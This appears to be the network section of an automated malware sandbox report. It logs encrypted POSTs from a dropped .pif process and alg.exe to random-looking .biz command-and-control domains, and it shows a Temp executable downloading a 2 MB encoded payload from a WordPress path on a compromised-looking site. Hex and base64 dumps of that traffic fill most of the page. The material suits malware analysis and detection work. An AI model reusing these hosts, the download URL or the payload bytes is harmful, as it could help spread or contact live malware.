                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.173928976 CET802OUTData Raw: 5c f2 af ed 03 bf 3c a3 16 03 00 00 b5 1a 8f ea 73 dc 1f b6 42 f5 24 dc 2f d7 27 fd 85 ac 88 20 ab 40 b0 1f 50 9e 17 2b 03 96 bc 3a 6c 10 65 4e 15 0f 26 ea 69 32 1c 92 92 8a e0 32 f3 b8 e1 7d dc a9 5d eb 05 e6 21 4c ff b0 3c c5 37 f1 74 50 be a2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \<sB$/' @P+:leN&i22}]!L<7tP3G"e|T9d)X\%u4J=k&v:J2US<`#KElpJ5/9X@G^_giG{DE_ nUrtv*k!,-Ldac?{


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        145192.168.2.8500203.254.94.185804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.330461025 CET356OUTPOST /byhbnbikqcomemw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.330713034 CET778OUTData Raw: 1f 07 47 d2 c2 eb 6f 16 fe 02 00 00 b3 60 1d d5 11 a2 5f c7 e7 ec 1c a9 49 9c cd 75 cb 10 ac f8 11 d7 3e bf f9 8b a1 b2 a0 88 59 12 1a 0c ba 5b 55 d9 9d 15 65 a2 fe 33 b5 db 4f 0f 3f 67 39 64 af 7b c7 62 42 38 cf 86 54 a2 c6 4d d5 39 84 c6 32 c2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Go`_Iu>Y[Ue3O?g9d{bB8TM92+k-Htrz-tH:msTw5P]AK+ndXg"ibkfhmw|qx$OH01KtMqgm}EP3>\G^qHh|X+
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.415045023 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:25:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ff2c089ada6a4684f9c1ef554ca5d15f|173.254.250.82|1730445901|1730445901|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        146192.168.2.85002472.52.178.23804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.958745956 CET348OUTPOST /jubq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.958772898 CET802OUTData Raw: 53 55 2b 09 7f 5b bc a9 16 03 00 00 b1 ef cd 74 3e 59 30 df d5 88 8d 9d aa 69 14 e3 f2 9a 71 8b 64 6e dd 8a af 16 d6 88 43 6e bc e7 bd f4 b0 53 ff 62 55 f6 1d a3 ea 79 10 b9 95 23 3f 06 63 93 c4 68 ee 1e 5b 56 da 8e c4 8f 98 b1 e8 51 7f 19 0d 6a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: SU+[t>Y0iqdnCnSbUy#?ch[VQj@`5>lbF9mofmAoc("%j.>3o-}fcc_BF5T>]jxkCC,<7[z#E-&xEM^.]\=#7@9])0P?OB


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        147192.168.2.85002918.141.10.107804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.677021027 CET354OUTPOST /xcnnbrtqgt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.677037954 CET778OUTData Raw: 8c 94 c2 17 6c a4 c6 ae fe 02 00 00 18 86 cf 0d 7e e3 4c 2d a6 7d 85 5d 4f 61 22 a8 2e 03 6b b1 cf 8a 50 e4 a1 06 63 a9 79 57 fd 82 8e 30 d9 54 e0 a2 44 aa c2 5f 1b 87 35 fd 6a 5b cc 5e fe 34 a4 a3 3d 95 2e a7 92 d3 e9 3c a7 a6 05 26 1b bf 12 03
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l~L-}]Oa".kPcyW0TD_5j[^4=.<&M_mJPuxiUe]i\mi/w~YBEfGkAtX.W5}m!$?Pm=R1Tx>aQum:pR_S`$'@D
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.105318069 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:25:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b10c257f64c20b2302490830b1f85f15|173.254.250.82|1730445902|1730445902|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        148192.168.2.85003144.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758977890 CET354OUTPOST /qoerrcmhybkh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758994102 CET802OUTData Raw: 1b 24 0b 46 f3 3d 1d 33 16 03 00 00 ac ef 50 be 96 fe d3 9b 8c 97 c0 60 4e fe 28 28 c1 91 16 a4 31 75 15 51 70 36 0b 09 57 77 71 c8 c3 04 ff a8 e3 87 7f 02 24 5c ea 63 30 13 23 2f 89 35 6b 98 c2 68 69 0a ba ed 6e be 09 f7 df a7 6c ea 0c d6 b9 47
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $F=3P`N((1uQp6Wwq$\c0#/5khinlG}LBKOtPZ^Q&O9Gl]8@cKU_6{*QodzPte4&@;087Q}GJC!eHFJYKalcT*.
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.419172049 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:25:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e8fe46040bf8ad8d55bb2914ca8d1d79|173.254.250.82|1730445902|1730445902|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        149192.168.2.85003618.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.456665039 CET347OUTPOST /fu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.456681013 CET802OUTData Raw: 68 ff 56 6c 86 17 f5 1b 16 03 00 00 98 3a 0c 0e 2b 73 a9 78 0a 37 23 b9 50 19 aa 48 dc 54 49 9e c6 ad a0 60 bf a3 24 1a cb 5d 40 02 e6 d4 21 17 cb ca 3b f4 08 65 df 78 b5 06 a0 b0 c4 d9 89 3f 10 40 3e 72 15 66 9f d4 52 ec 64 6a 93 22 52 2a 04 f8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: hVl:+sx7#PHTI`$]@!;ex?@>rfRdj"R*,K6w{1aj^("CHL~=s8G_t3y=qG{{*qVNCIP2RtWFDH~vDI6U<
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.887723923 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:25:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=46628255238ba9ab85c21959abe9861a|173.254.250.82|1730445903|1730445903|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        0192.168.2.849707188.114.97.34433840C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:16 UTC178OUTGET /wp-admin/233_Jwsmvmdweya HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: chichometextiles.com
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC909INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2181536
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        last-modified: Tue, 29 Oct 2024 08:10:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        etag: "6720988c-2149a0"
                                                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dtFS6YweOKbLJrfi4l0daiNKInGWD7P21LvfUflM%2BQQUR%2FVC7cSoez0dXpwEp6rQgZcK%2Fsf2rVHKdJPzS9bUct7WBqNlGG%2FbXqQbAHohwpYnGHPBtuULhYw4IbQF6PF7n4jafqWdxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8dba23772e6e2cb2-DFW
                                                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=792&delivery_rate=2373770&cwnd=251&unsent_bytes=0&cid=7345f70826a93939&ts=307&x=0"
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 59 47 42 73 56 45 53 49 65 48 68 30 66 44 78 49 6a 46 79 51 61 47 43 63 61 44 68 6f 5a 49 78 67 6b 48 52 49 6d 49 53 41 50 48 78 73 53 48 41 34 65 47 68 63 61 46 68 34 63 44 69 45 65 47 42 4d 6b 45 42 45 56 45 42 6f 56 45 78 59 6e 46 42 59 54 4a 69 4d 57 44 68 38 4f 4a 52 6b 61 49 42 6d 6d 72 71 56 5a 49 36 65 78 53 31 55 6b 49 42 6f 6a 47 68 45 6b 45 69 59 4f 70 71 36 6c 57 53 4f 6e 73 55 76 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: pq6lWSOnsUsYGBsVESIeHh0fDxIjFyQaGCcaDhoZIxgkHRImISAPHxsSHA4eGhcaFh4cDiEeGBMkEBEVEBoVExYnFBYTJiMWDh8OJRkaIBmmrqVZI6exS1UkIBojGhEkEiYOpq6lWSOnsUvb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 39 39 6c 57 54 6d 4e 47 73 72 66 58 51 6a 5a 37 6d 68 50 79 65 4c 50 54 57 35 53 63 77 63 31 34 73 77 53 76 6c 56 48 6d 55 44 41 54 38 58 61 7a 43 36 38 77 64 54 41 70 38 58 47 77 37 79 75 32 74 6e 53 32 52 33 5a 32 74 58 61 37 4e 6e 59 7a 73 45 78 77 39 48 41 7a 50 50 41 7a 4e 72 56 34 38 48 4b 7a 39 6e 31 30 63 48 57 7a 41 58 4a 78 39 76 5a 61 37 7a 55 31 4e 70 31 78 4e 56 70 62 6d 70 70 65 48 68 6b 61 32 4a 69 63 58 68 34 6b 6d 31 7a 5a 6d 31 6e 31 58 58 54 5a 48 70 36 63 57 78 63 62 33 68 72 6c 48 43 58 63 32 5a 76 6b 57 5a 7a 64 6d 46 6e 59 33 46 6e 65 32 52 79 61 58 46 37 64 57 6c 7a 69 6d 61 61 65 33 4a 73 5a 57 78 6e 58 6d 56 32 5a 57 78 64 64 6d 74 70 63 46 31 6e 62 31 35 6a 58 57 64 6c 64 6e 6c 74 79 57 31 6b 59 35 74 6c 59 58 56 67 5a 47 4a 36
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 99lWTmNGsrfXQjZ7mhPyeLPTW5Scwc14swSvlVHmUDAT8XazC68wdTAp8XGw7yu2tnS2R3Z2tXa7NnYzsExw9HAzPPAzNrV48HKz9n10cHWzAXJx9vZa7zU1Np1xNVpbmppeHhka2JicXh4km1zZm1n1XXTZHp6cWxcb3hrlHCXc2ZvkWZzdmFnY3Fne2RyaXF7dWlzimaae3JsZWxnXmV2ZWxddmtpcF1nb15jXWdldnltyW1kY5tlYXVgZGJ6
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 51 38 66 77 33 66 4d 71 68 68 6f 68 41 51 37 52 74 49 47 4d 72 56 30 50 70 2f 45 4a 32 39 34 58 6a 4a 76 4d 46 4e 45 69 68 4a 46 76 4b 4f 31 64 72 55 57 4a 6f 6e 34 77 38 67 79 38 36 2f 30 53 69 44 49 36 4f 66 72 69 66 4b 7a 39 74 6d 6d 68 44 5a 30 63 43 77 44 4e 50 56 77 39 52 2f 56 39 46 45 4b 66 7a 77 72 66 77 55 30 73 32 2f 35 2f 33 53 46 47 76 6b 6b 39 58 55 76 55 47 4d 45 71 5a 49 4e 59 58 53 77 74 55 4b 68 43 45 69 75 7a 72 6f 32 63 48 56 57 4a 63 52 49 62 57 6f 57 73 7a 59 30 70 57 44 49 45 41 48 2b 48 76 4f 79 62 2b 4a 67 68 51 76 74 4b 45 50 6f 30 63 72 51 41 63 65 38 72 33 42 77 34 51 53 4a 4d 39 4e 48 7a 58 56 32 38 6b 4b 67 69 57 6a 57 65 71 38 77 4d 33 4b 32 4a 41 6b 73 69 5a 44 36 39 48 42 31 69 49 6e 4b 63 48 58 30 67 45 44 7a 50 6c 4b 31
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Q8fw3fMqhhohAQ7RtIGMrV0Pp/EJ294XjJvMFNEihJFvKO1drUWJon4w8gy86/0SiDI6OfrifKz9tmmhDZ0cCwDNPVw9R/V9FEKfzwrfwU0s2/5/3SFGvkk9XUvUGMEqZINYXSwtUKhCEiuzro2cHVWJcRIbWoWszY0pWDIEAH+HvOyb+JghQvtKEPo0crQAce8r3Bw4QSJM9NHzXV28kKgiWjWeq8wM3K2JAksiZD69HB1iInKcHX0gEDzPlK1
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 55 76 67 69 4d 45 69 69 43 72 47 6b 53 39 69 6a 4e 31 39 4a 48 56 63 33 57 69 75 63 51 30 62 7a 41 78 34 55 50 38 31 77 56 37 74 58 59 7a 48 47 52 48 39 32 51 70 58 66 5a 30 63 4d 7a 48 43 61 73 78 6a 74 77 32 39 62 61 37 77 38 52 77 63 44 44 30 6b 33 4a 36 42 58 71 66 63 72 56 30 51 49 6f 45 4b 50 66 38 51 76 4a 76 4d 4b 75 6b 53 67 68 7a 79 56 64 31 64 72 57 37 70 49 6e 35 33 79 73 59 38 36 2f 30 6b 53 4c 49 78 6b 55 38 7a 66 76 44 69 6e 4f 79 62 35 70 55 63 56 41 73 78 48 32 77 39 54 61 76 33 30 71 7a 4c 33 44 78 51 54 46 30 73 32 2f 71 76 33 53 4e 57 33 34 52 4e 58 55 76 31 38 4e 45 73 33 4a 76 6b 35 51 78 66 76 33 71 51 7a 42 31 64 69 4a 67 68 47 77 4a 37 56 73 32 38 36 2b 4d 59 63 71 39 47 44 70 4e 64 6e 4b 7a 41 6f 65 47 53 69 38 6e 62 72 52 79 4e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: UvgiMEiiCrGkS9ijN19JHVc3WiucQ0bzAx4UP81wV7tXYzHGRH92QpXfZ0cMzHCasxjtw29ba7w8RwcDD0k3J6BXqfcrV0QIoEKPf8QvJvMKukSghzyVd1drW7pIn53ysY86/0kSLIxkU8zfvDinOyb5pUcVAsxH2w9Tav30qzL3DxQTF0s2/qv3SNW34RNXUv18NEs3Jvk5Qxfv3qQzB1diJghGwJ7Vs286+MYcq9GDpNdnKzAoeGSi8nbrRyN
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 4b 63 4e 52 4e 63 44 42 32 38 33 79 69 42 37 33 78 55 6c 76 7a 74 6e 49 31 34 6f 67 4f 79 33 78 68 63 4c 52 79 37 68 2b 45 7a 62 6c 53 6a 6a 59 7a 4c 2f 71 6b 68 4b 37 70 75 65 48 32 72 2f 57 53 52 6f 6c 48 46 37 34 62 4e 75 2f 77 59 55 62 44 75 55 61 77 68 58 4e 31 39 4a 39 4a 31 73 77 32 63 48 58 30 59 62 42 71 76 4f 7a 79 42 34 7a 30 39 58 59 7a 73 46 42 4e 79 34 35 71 70 79 34 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: KcNRNcDB283yiB73xUlvztnI14ogOy3xhcLRy7h+EzblSjjYzL/qkhK7pueH2r/WSRolHF74bNu/wYUbDuUawhXN19J9J1sw2cHX0YbBqvOzyB4z09XYzsFBNy45qpy40cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1347INData Raw: 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN19HB1drV2cHX0bzB286/08zY09XYztnKz9nOyb7Z0cLRyNTVw9Tb29bYzL3BwcDC0s2+2r/V28rV0dXUvtu/wM3JvMPSwtbN
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01 07:23:17 UTC1369INData Raw: 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48 42 31 64 72 56 32 63 48 58 30 62 7a 42 32 38 36 2f 30 38 7a 59 30 39 58 59 7a 74 6e 4b 7a 39 6e 4f 79 62 37 5a 30 63 4c 52 79 4e 54 56 77 39 54 62 32 39 62 59 7a 4c 33 42 77 63 44 43 30 73 32 2b 32 72 2f 56 32 38 72 56 30 64 58 55 76 74 75 2f 77 4d 33 4a 76 4d 50 53 77 74 62 4e 31 39 48
